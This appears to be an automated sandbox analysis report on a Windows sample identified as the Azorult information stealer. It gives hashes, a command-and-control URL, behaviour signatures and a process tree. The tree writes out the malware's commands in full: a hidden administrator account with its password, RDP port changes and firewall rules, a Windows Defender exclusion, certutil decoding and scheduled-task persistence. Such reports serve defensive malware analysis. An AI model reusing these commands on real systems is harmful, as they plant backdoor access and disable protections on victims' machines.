Analysis
-
max time kernel
130s -
max time network
105s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system -
submitted
22-12-2024 18:16
Static task
static1
Behavioral task
behavioral1
Sample
c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe
Resource
win10v2004-20241007-en
General
-
Target
c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe
-
Size
3.2MB
-
MD5
7aaa757fa6b13340fa16c6c7eebb0c0f
-
SHA1
3ea1381da382411231389c8be2c1117310a8efe0
-
SHA256
c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07
-
SHA512
1e372f60f5262742435ed5fddca5cf01362497b930ca614e30e3661defa74c8e2d8934926b94ae94f94c42b6d6e972afb0c3dfddb5bf7b928c4c7accc21ebe53
-
SSDEEP
98304:i1Eu7EywnDEADZ6dly16EOM8RvFs4j25wcMIn:i1ERNnDEAFwM16E+RvFs4j8w+n
Malware Config
Extracted
azorult
http://0-800-email.com/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
pid 896: net.exe
pid 832: net1.exe
-
Blocklisted process makes network request 4 IoCs
flow 27, pid 2416: WScript.exe
flow 28, pid 2416: WScript.exe
flow 29, pid 804: WScript.exe
flow 30, pid 804: WScript.exe
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid 2500: powershell.exe
pid 768: powershell.exe
pid 1540: powershell.exe
-
Modifies RDP port number used by Windows 1 TTPs
-
Modifies Windows Firewall 2 TTPs 6 IoCs
pid 2552: netsh.exe
pid 2940: netsh.exe
pid 1644: netsh.exe
pid 1372: netsh.exe
pid 2284: netsh.exe
pid 2856: netsh.exe
-
Server Software Component: Terminal Services DLL 1 TTPs 3 IoCs
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll" by RDPWInst.exe
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" by RDPWInst.exe
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" by RDPWInst.exe
-
Executes dropped EXE 11 IoCs
pid 2116: err.exe
pid 2788: dos.com
pid 2728: dos.com
pid 2740: dos.com
pid 2444: dos.com
pid 3000: dos.com
pid 1664: dos.com
pid 1592: RDPWInst.exe
pid 3036: RDPWInst.exe
pid 2064: RDPWInst.exe
pid 992: RDPWInst.exe
-
Loads dropped DLL 14 IoCs
pid 2360: c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe
pid 2360: c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe
pid 2360: c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe
pid 2360: c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe
pid 2360: c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe
pid 2788: dos.com
pid 2728: dos.com
pid 2740: dos.com
pid 1784: cmd.exe
pid 1784: cmd.exe
pid 1536: Process not Found
pid 1784: cmd.exe
pid 1784: cmd.exe
pid 1568: svchost.exe
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
pid 2764: certutil.exe
pid 2708: certutil.exe
pid 2924: certutil.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow 9: raw.githubusercontent.com
flow 10: raw.githubusercontent.com
flow 20: raw.githubusercontent.com
flow 21: raw.githubusercontent.com
-
Modifies WinLogon 2 TTPs 2 IoCs
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" by RDPWInst.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" by RDPWInst.exe
-
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
Drops file in System32 directory 12 IoCs
File opened for modification C:\Windows\system32\CatRoot2\edb.chk by svchost.exe
File opened for modification C:\Windows\system32\CatRoot2\edb.log by svchost.exe
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk by powershell.exe
File opened for modification C:\Windows\System32\null by cmd.exe
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk by powershell.exe
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk by powershell.exe
File opened for modification C:\Windows\System32\dnsrsvlr.log by svchost.exe
File opened for modification C:\Windows\System32\asyncreg.log by svchost.exe
File created C:\Windows\System32\null by cmd.exe
File opened for modification C:\Windows\System32\null by cmd.exe
File opened for modification C:\Windows\system32\CatRoot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\catdb by svchost.exe
File opened for modification C:\Windows\system32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb by svchost.exe
-
Hide Artifacts: Hidden Users 1 TTPs 3 IoCs
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\MENVELaJIp = "0" by reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\MENVELaJIp = "0" by reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\MENVELaJIp = "0" by reg.exe
-
Suspicious use of SetThreadContext 3 IoCs
PID 2788 set thread context of 3000 (process 2788 dos.com, target 41)
PID 2728 set thread context of 2444 (process 2728 dos.com, target 42)
PID 2740 set thread context of 1664 (process 2740 dos.com, target 43)
-
Drops file in Program Files directory 11 IoCs
File opened for modification C:\Program Files\RDP Wrapper by dos.com
File opened for modification C:\Program Files\RDP Wrapper\autoupdate.bat by dos.com
File created C:\Program Files\RDP Wrapper\rdpwrap.ini by RDPWInst.exe
File created C:\Program Files\RDP Wrapper\rdpwrap.dll by RDPWInst.exe
File opened for modification C:\Program Files\RDP Wrapper\plink.exe by dos.com
File created C:\Program Files\RDP Wrapper\RDPWInst.exe by dos.com
File opened for modification C:\Program Files\RDP Wrapper\RDPWInst.exe by dos.com
File created C:\Program Files\RDP Wrapper\autoupdate.bat by dos.com
File created C:\Program Files\RDP Wrapper\rdpwrap.ini by RDPWInst.exe
File created C:\Program Files\RDP Wrapper\rdpwrap.dll by RDPWInst.exe
File created C:\Program Files\RDP Wrapper\plink.exe by dos.com
-
Launches sc.exe 1 IoCs
Sc.exe is a Windows utility to control services on the system.
pid 2920: sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 18 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh by netsh.exe
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh by netsh.exe
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh by netsh.exe
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh by netsh.exe
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh by netsh.exe
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh by netsh.exe
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh by netsh.exe
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh by netsh.exe
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh by netsh.exe
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh by netsh.exe
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh by netsh.exe
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh by netsh.exe
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh by netsh.exe
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh by netsh.exe
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh by netsh.exe
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh by netsh.exe
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh by netsh.exe
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh by netsh.exe
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 57 IoCs
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
Delays execution with timeout.exe 3 IoCs
pid 352: timeout.exe
pid 2444: timeout.exe
pid 2348: timeout.exe
-
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid 2900: schtasks.exe
pid 2148: schtasks.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid 2788: dos.com
pid 2728: dos.com
pid 2740: dos.com
pid 768: powershell.exe
pid 1568: svchost.exe
pid 1568: svchost.exe
pid 1540: powershell.exe
pid 2500: powershell.exe
-
Suspicious behavior: LoadsDriver 6 IoCs
pid 1536: Process not Found
pid 2168: Process not Found
pid 1568: svchost.exe
pid 1568: svchost.exe
pid 1568: svchost.exe
pid 1568: svchost.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe (depth 1)
Command line: "C:\Users\Admin\AppData\Local\Temp\c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe"
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\err.exe (depth 2)
Command line: "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\err.exe"
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2116
-
-
C:\Windows\SysWOW64\certutil.exe (depth 2)
Command line: "C:\Windows\System32\certutil.exe" -decode dera deras
- Deobfuscate/Decode Files or Information
- System Location Discovery: System Language Discovery
PID:2764
-
-
C:\Windows\SysWOW64\certutil.exe (depth 2)
Command line: "C:\Windows\System32\certutil.exe" -decode sfera sferas
- Deobfuscate/Decode Files or Information
- System Location Discovery: System Language Discovery
PID:2708
-
-
C:\Windows\SysWOW64\certutil.exe (depth 2)
Command line: "C:\Windows\System32\certutil.exe" -decode bruto brutos
- Deobfuscate/Decode Files or Information
- System Location Discovery: System Language Discovery
PID:2924
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com (depth 2)
Command line: "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com" deras
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com (depth 3)
Command line: "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com"
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3000
-
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com (depth 2)
Command line: "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com" brutos
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com (depth 3)
Command line: "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com"
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\SysWOW64\cmd.exe (depth 4)
Command line: C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\ieql.vbs" MENVELaJIp iFxgLSBWge "C:\Users\Admin\AppData\Roaming\CLNT.vbs" "C:\Users\Admin\AppData\Roaming\KfFhiFEm.bat" "C:\Users\Admin\AppData\Roaming\jJF.dll"
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\SysWOW64\cscript.exe (depth 5)
Command line: cscript.exe "C:\Users\Admin\AppData\Roaming\ieql.vbs" MENVELaJIp iFxgLSBWge "C:\Users\Admin\AppData\Roaming\CLNT.vbs" "C:\Users\Admin\AppData\Roaming\KfFhiFEm.bat" "C:\Users\Admin\AppData\Roaming\jJF.dll"
- System Location Discovery: System Language Discovery
PID:988
-
-
-
C:\Windows\SysWOW64\cmd.exe (depth 4)
Command line: C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\jJF.dll" /tn BsqsRhUj
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\SysWOW64\schtasks.exe (depth 5)
Command line: schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\jJF.dll" /tn BsqsRhUj
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2900
-
-
-
C:\Windows\SysWOW64\cmd.exe (depth 4)
Command line: C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\ieql.vbs" MENVELaJIp iFxgLSBWge "C:\Users\Admin\AppData\Roaming\OwDsV.vbs" "{7FB22DB6-7827-4FED-A97A-E3C32288467B}" "C:\Users\Admin\AppData\Roaming\jJF.dll"
- System Location Discovery: System Language Discovery
PID:1496 -
C:\Windows\SysWOW64\cscript.exe (depth 5)
Command line: cscript.exe "C:\Users\Admin\AppData\Roaming\ieql.vbs" MENVELaJIp iFxgLSBWge "C:\Users\Admin\AppData\Roaming\OwDsV.vbs" "{7FB22DB6-7827-4FED-A97A-E3C32288467B}" "C:\Users\Admin\AppData\Roaming\jJF.dll"
- System Location Discovery: System Language Discovery
PID:2168
-
-
-
C:\Windows\SysWOW64\cmd.exe (depth 4)
Command line: C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\jJF.dll" /tn OqlIVbcp
- System Location Discovery: System Language Discovery
PID:2184 -
C:\Windows\SysWOW64\schtasks.exe (depth 5)
Command line: schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\jJF.dll" /tn OqlIVbcp
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2148
-
-
-
C:\Windows\SysWOW64\cmd.exe (depth 4)
Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\aYOPKyHNFQ.bat MENVELaJIp iFxgLSBWge"
- System Location Discovery: System Language Discovery
PID:2952 -
C:\Windows\SysWOW64\cmd.exe (depth 5)
Command line: C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
- System Location Discovery: System Language Discovery
PID:2392 -
C:\Windows\SysWOW64\Wbem\WMIC.exe (depth 6)
Command line: wmic group where sid="S-1-5-32-544" get name /value
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2164
-
-
-
C:\Windows\SysWOW64\cmd.exe (depth 5)
Command line: C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
- System Location Discovery: System Language Discovery
PID:1032 -
C:\Windows\SysWOW64\Wbem\WMIC.exe (depth 6)
Command line: wmic group where sid="S-1-5-32-555" get name /value
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1072
-
-
-
C:\Windows\SysWOW64\net.exe (depth 5)
Command line: net user MENVELaJIp iFxgLSBWge /add
- System Location Discovery: System Language Discovery
PID:780 -
C:\Windows\SysWOW64\net1.exe (depth 6)
Command line: C:\Windows\system32\net1 user MENVELaJIp iFxgLSBWge /add
- System Location Discovery: System Language Discovery
PID:828
-
-
-
C:\Windows\SysWOW64\net.exe (depth 5)
Command line: net localgroup Administrators MENVELaJIp /add
- System Location Discovery: System Language Discovery
PID:940 -
C:\Windows\SysWOW64\net1.exe (depth 6)
Command line: C:\Windows\system32\net1 localgroup Administrators MENVELaJIp /add
- System Location Discovery: System Language Discovery
PID:1848
-
-
-
C:\Windows\SysWOW64\net.exe (depth 5)
Command line: net localgroup "Remote Desktop Users" MENVELaJIp /add
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
PID:896 -
C:\Windows\SysWOW64\net1.exe (depth 6)
Command line: C:\Windows\system32\net1 localgroup "Remote Desktop Users" MENVELaJIp /add
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
PID:832
-
-
-
C:\Windows\SysWOW64\net.exe (depth 5)
Command line: net accounts /maxpwage:unlimited
- System Location Discovery: System Language Discovery
PID:1532 -
C:\Windows\SysWOW64\net1.exe (depth 6)
Command line: C:\Windows\system32\net1 accounts /maxpwage:unlimited
- System Location Discovery: System Language Discovery
PID:2320
-
-
-
C:\Windows\SysWOW64\reg.exe (depth 5)
Command line: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v MENVELaJIp /t REG_DWORD /d "00000000" /f
- Hide Artifacts: Hidden Users
- System Location Discovery: System Language Discovery
PID:2196
-
-
C:\Windows\SysWOW64\reg.exe (depth 5)
Command line: reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
- System Location Discovery: System Language Discovery
PID:2940
-
-
C:\Windows\SysWOW64\netsh.exe (depth 5)
Command line: netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1372
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 5)
Command line: powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:768
-
-
C:\Windows\SysWOW64\timeout.exe (depth 5)
Command line: Timeout /t 15
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:352
-
-
-
C:\Windows\SysWOW64\cmd.exe (depth 4)
Command line: C:\Windows\system32\cmd.exe /c "C:\Program Files\RDP Wrapper\autoupdate.bat"
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1784 -
C:\Windows\SysWOW64\fsutil.exe (depth 5)
Command line: fsutil dirty query C:
- System Location Discovery: System Language Discovery
PID:2060
-
-
C:\Windows\SysWOW64\sc.exe (depth 5)
Command line: sc queryex "TermService"
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2920
-
-
C:\Windows\SysWOW64\find.exe (depth 5)
Command line: find "STATE"
- System Location Discovery: System Language Discovery
PID:1324
-
-
C:\Windows\SysWOW64\find.exe (depth 5)
Command line: find /v "RUNNING"
- System Location Discovery: System Language Discovery
PID:1564
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe (depth 5)
Command line: "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1592
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe (depth 5)
Command line: "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:3036 -
C:\Windows\system32\netsh.exe (depth 6)
Command line: netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2284
-
-
-
C:\Windows\SysWOW64\reg.exe (depth 5)
Command line: reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
- System Location Discovery: System Language Discovery
PID:2900
-
-
C:\Windows\SysWOW64\reg.exe (depth 5)
Command line: reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
- System Location Discovery: System Language Discovery
PID:1708
-
-
C:\Windows\SysWOW64\cmd.exe (depth 5)
Command line: C:\Windows\system32\cmd.exe /c query session rdp-tcp
- System Location Discovery: System Language Discovery
PID:1896
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -u5⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2064 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall delete rule name="Remote Desktop"6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2856
-
-
-
        C:\Program Files\RDP Wrapper\RDPWInst.exe (depth 5)
          Command line: "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
          - Server Software Component: Terminal Services DLL
          - Executes dropped EXE
          - Modifies WinLogon
          - Drops file in Program Files directory
          - System Location Discovery: System Language Discovery
          PID: 992
          C:\Windows\system32\netsh.exe (depth 6)
            Command line: netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
            - Modifies Windows Firewall
            - Event Triggered Execution: Netsh Helper DLL
            PID: 2552
        C:\Windows\SysWOW64\reg.exe (depth 5)
          Command line: reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
          - System Location Discovery: System Language Discovery
          PID: 752
        C:\Windows\SysWOW64\reg.exe (depth 5)
          Command line: reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
          - System Location Discovery: System Language Discovery
          PID: 280
        C:\Windows\SysWOW64\reg.exe (depth 5)
          Command line: reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
          - System Location Discovery: System Language Discovery
          PID: 324
        C:\Windows\SysWOW64\cmd.exe (depth 5)
          Command line: C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
          - System Location Discovery: System Language Discovery
          PID: 2240
          C:\Windows\SysWOW64\cscript.exe (depth 6)
            Command line: cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
            - System Location Discovery: System Language Discovery
            PID: 1212
        C:\Windows\SysWOW64\cmd.exe (depth 5)
          Command line: C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
          - System Location Discovery: System Language Discovery
          PID: 1644
          C:\Windows\SysWOW64\reg.exe (depth 6)
            Command line: reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
            - System Location Discovery: System Language Discovery
            PID: 296
        C:\Windows\SysWOW64\reg.exe (depth 5)
          Command line: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "6.1.7601.17514" /f
          - System Location Discovery: System Language Discovery
          PID: 376
        C:\Windows\SysWOW64\findstr.exe (depth 5)
          Command line: findstr /c:"[6.1.7601.17514]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
          - System Location Discovery: System Language Discovery
          PID: 2980
  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com (depth 2)
    Command line: "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com" sferas
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID: 2728
    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com (depth 3)
      Command line: "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com"
      - Executes dropped EXE
      PID: 2444
C:\Windows\system32\svchost.exe (depth 1)
  Command line: C:\Windows\system32\svchost.exe -k NetworkService
  - Loads dropped DLL
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: LoadsDriver
  PID: 1568
C:\Windows\system32\taskeng.exe (depth 1)
  Command line: taskeng.exe {3971B318-4712-46E1-A4B0-0A3301C46688} S-1-5-21-3551809350-4263495960-1443967649-1000:NNYJZAHP\Admin:Interactive:[1]
  PID: 320
  C:\Windows\System32\WScript.exe (depth 2)
    Command line: C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\CLNT.vbs" MENVELaJIp iFxgLSBWge "C:\Users\Admin\AppData\Roaming\KfFhiFEm.bat"
    PID: 1344
    C:\Windows\System32\cmd.exe (depth 3)
      Command line: "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\KfFhiFEm.bat
      - Drops file in System32 directory
      PID: 2120
      C:\Windows\system32\cmd.exe (depth 4)
        Command line: C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
        PID: 2780
        C:\Windows\System32\Wbem\WMIC.exe (depth 5)
          Command line: wmic group where sid="S-1-5-32-544" get name /value
          PID: 2644
      C:\Windows\system32\cmd.exe (depth 4)
        Command line: C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
        PID: 796
        C:\Windows\System32\Wbem\WMIC.exe (depth 5)
          Command line: wmic group where sid="S-1-5-32-555" get name /value
          PID: 1496
      C:\Windows\system32\net.exe (depth 4)
        Command line: net user MENVELaJIp iFxgLSBWge /add
        PID: 1204
        C:\Windows\system32\net1.exe (depth 5)
          Command line: C:\Windows\system32\net1 user MENVELaJIp iFxgLSBWge /add
          PID: 2020
      C:\Windows\system32\net.exe (depth 4)
        Command line: net localgroup Administrators MENVELaJIp /add
        PID: 1308
        C:\Windows\system32\net1.exe (depth 5)
          Command line: C:\Windows\system32\net1 localgroup Administrators MENVELaJIp /add
          PID: 1036
      C:\Windows\system32\net.exe (depth 4)
        Command line: net localgroup Remote Desktop Users MENVELaJIp /add
        PID: 1300
        C:\Windows\system32\net1.exe (depth 5)
          Command line: C:\Windows\system32\net1 localgroup Remote Desktop Users MENVELaJIp /add
          PID: 1068
      C:\Windows\system32\net.exe (depth 4)
        Command line: net accounts /maxpwage:unlimited
        PID: 2356
        C:\Windows\system32\net1.exe (depth 5)
          Command line: C:\Windows\system32\net1 accounts /maxpwage:unlimited
          PID: 1740
      C:\Windows\system32\reg.exe (depth 4)
        Command line: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v MENVELaJIp /t REG_DWORD /d "00000000" /f
        - Hide Artifacts: Hidden Users
        PID: 2180
      C:\Windows\system32\reg.exe (depth 4)
        Command line: reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
        PID: 700
      C:\Windows\system32\netsh.exe (depth 4)
        Command line: netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
        - Modifies Windows Firewall
        - Event Triggered Execution: Netsh Helper DLL
        PID: 2940
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 4)
        Command line: powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
        - Command and Scripting Interpreter: PowerShell
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        PID: 1540
      C:\Windows\system32\timeout.exe (depth 4)
        Command line: Timeout /t 15
        - Delays execution with timeout.exe
        PID: 2444
  C:\Windows\System32\WScript.exe (depth 2)
